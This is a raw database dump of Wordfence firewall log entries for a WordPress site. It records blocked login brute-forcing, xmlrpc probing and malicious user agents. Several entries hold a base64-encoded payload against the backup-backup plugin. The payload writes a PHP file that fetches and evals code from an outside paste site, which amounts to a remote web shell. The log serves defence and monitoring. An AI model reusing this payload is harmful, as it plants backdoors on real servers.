Network',NULL),(15350,0.000000,1704897837.118446,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15351,0.000000,1704897862.617640,'\0\0\0\0\0\0\0\0\0\0M',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15352,1704898292.141480,1704898292.036700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15346,1704897376.266552,1704897376.148900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15344,0.000000,1704896912.951378,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15345,0.000000,1704896956.972483,'\0\0\0\0\0\0\0\0\0\0b',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14674,1704680469.601118,1704680469.555000,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"ZWNobyAiPD9waHAgZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cHM6Ly9yZW50cnkuY28vMmJ1Z20vcmF3JykpOyIgLi4vLi4vLi4vdXBsb2Fkcy93cC1yeXJpLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14699,0.000000,1704698080.423831,'&\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14700,0.000000,1704699103.413871,'\0\0\0\0\0\0\0\0\0\0Kݴ',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14701,0.000000,1704699334.785753,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14702,0.000000,1704702477.356837,'\0\0\0\0\0\0\0\0\0\0F=',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14703,0.000000,1704702603.334487,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14704,0.000000,1704703359.849692,'\0\0\0\0\0\0\0\0\0\0>*o',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14705,0.000000,1704705854.066961,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14706,0.000000,1704706385.199308,'\0\0\0\0\0\0\0\0\0\0-=',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14707,0.000000,1704706387.245462,'\0\0\0\0\0\0\0\0\0\0F=',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14708,0.000000,1704707538.831404,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14709,0.000000,1704708286.454483,'\0\0\0\0\0\0\0\0\0\0N ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14710,1704713404.103099,1704713404.024100,'\0\0\0\0\0\0\0\0\0\0w',0,403,0,0,0,'https://www.tummyrevolution.com/wp-admin/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3htcmxwYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14753,0.000000,1704732686.075047,'*\0\Z(]\0\0\0\0\0\0\0',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14754,0.000000,1704732716.011113,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14755,1704734001.446545,1704734001.359200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/upload/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(14711,1704713398.134489,1704713398.048600,'\0\0\0\0\0\0\0\0\0\0w',0,403,0,0,0,'https://www.tummyrevolution.com/wp-admin/css/colors/blue/xmrlpc.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvYmx1ZS94bXJscGMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14752,0.000000,1704732436.816178,'\0\0\0\0\0\0\0\0\0\0#:',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14675,1704680468.380213,1704680468.310500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5WzFd\",\"paramValue\":\"ZWNobyAiPD9waHAgZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cHM6Ly9yZW50cnkuY28vMmJ1Z20vcmF3JykpOyIgLi4vLi4vLi4vLi4vd3Ata3ZvYi5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14677,0.000000,1704681976.394293,'\0\0\0\0\0\0\0\0\0\0I',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14678,0.000000,1704682854.179547,'\0\0\0\0\0\0\0\0\0\0+',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14679,0.000000,1704682981.417445,'\0\0\0\0\0\0\0\0\0\0kY',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14680,0.000000,1704683032.840413,'$\0a\0\0\0\0\0\0\0m',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14681,0.000000,1704685134.109581,'\0\0\0\0\0\0\0\0\0\0\ZzP',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14682,0.000000,1704686177.851712,'\0\0\0\0\0\0\0\0\0\0H',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14683,0.000000,1704687224.335728,'*\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14684,0.000000,1704687968.130638,'\0\0\0\0\0\0\0\0\0\0K',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14685,0.000000,1704688105.736459,'\0\0\0\0\0\0\0\0\0\0LA',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14686,0.000000,1704688270.134235,'\0\0\0\0\0\0\0\0\0\0[z',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14687,0.000000,1704689306.740814,'\0\0\0\0\0\0\0\0\0\0\"]B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14688,0.000000,1704689507.215350,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14689,0.000000,1704690340.711404,'\0\0\0\0\0\0\0\0\0\0Y\'m',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14690,0.000000,1704690776.024778,'\0\0\0\0\0\0\0\0\0\0D4D',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14691,0.000000,1704691375.186843,'\0\0\0\0\0\0\0\0\0\0%-',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14692,0.000000,1704692415.188781,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14693,0.000000,1704693131.199130,'*\0 %\0@\0\0\0\0A',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14694,0.000000,1704693443.659908,'\0\0\0\0\0\0\0\0\0\0E',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14695,0.000000,1704694480.967902,'\0\0\0\0\0\0\0\0\0\0ٹ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14696,0.000000,1704695515.814877,'\0\0\0\0\0\0\0\0\0\0ٹ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14697,0.000000,1704696548.916377,'\0\0\0\0\0\0\0\0\0\0[y[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14698,0.000000,1704697587.924581,'\0\0\0\0\0\0\0\0\0\0ν;',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14676,0.000000,1704680917.561107,'&\0<\0\0\0\0<',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15065,0.000000,1704833927.134560,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15066,0.000000,1704833927.200733,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15067,0.000000,1704834138.539438,'\0\0\0\0\0\0\0\0\0\0B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15068,1704834451.105132,1704834451.003600,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15069,1704834451.104389,1704834451.002400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15070,0.000000,1704834525.461051,'\0\0\0\0\0\0\0\0\0\0%-',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15071,0.000000,1704834970.606627,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15072,1704835501.999117,1704835501.903100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15073,1704835499.885113,1704835499.805700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15074,1704834972.086616,1704834972.031100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15075,0.000000,1704835803.523988,'\0\0\0\0\0\0\0\0\0\0^i',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15076,0.000000,1704836018.123484,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15077,0.000000,1704836018.074663,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15078,0.000000,1704836295.873356,'\0\0\0\0\0\0\0\0\0\0>f',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15079,1704836539.744713,1704836539.652800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15080,1704836539.733619,1704836539.653400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15081,0.000000,1704837057.893258,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15082,0.000000,1704837057.664076,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15083,0.000000,1704837079.912721,' A\0$T\0\0\0\0\0\0\0\0',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailValidUsername',NULL,NULL),(15084,1704837574.461688,1704837574.356200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15085,1704837574.436266,1704837574.356300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15086,0.000000,1704838094.227222,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15087,0.000000,1704838094.127256,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15088,0.000000,1704838369.152477,'\0\0\0\0\0\0\0\0\0\0J',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15089,1704838620.680067,1704838620.600400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15090,1704838620.679698,1704838620.599400,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15091,0.000000,1704838729.798585,'* 1\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15092,0.000000,1704839139.504534,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15093,0.000000,1704839139.517692,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15094,0.000000,1704839643.668558,'\0\0\0\0\0\0\0\0\0\0ν;',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15095,1704839661.074472,1704839660.962800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14879,1704759400.897908,1704759400.823700,'\0\0\0\0\0\0\0\0\0\0)ؼ',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 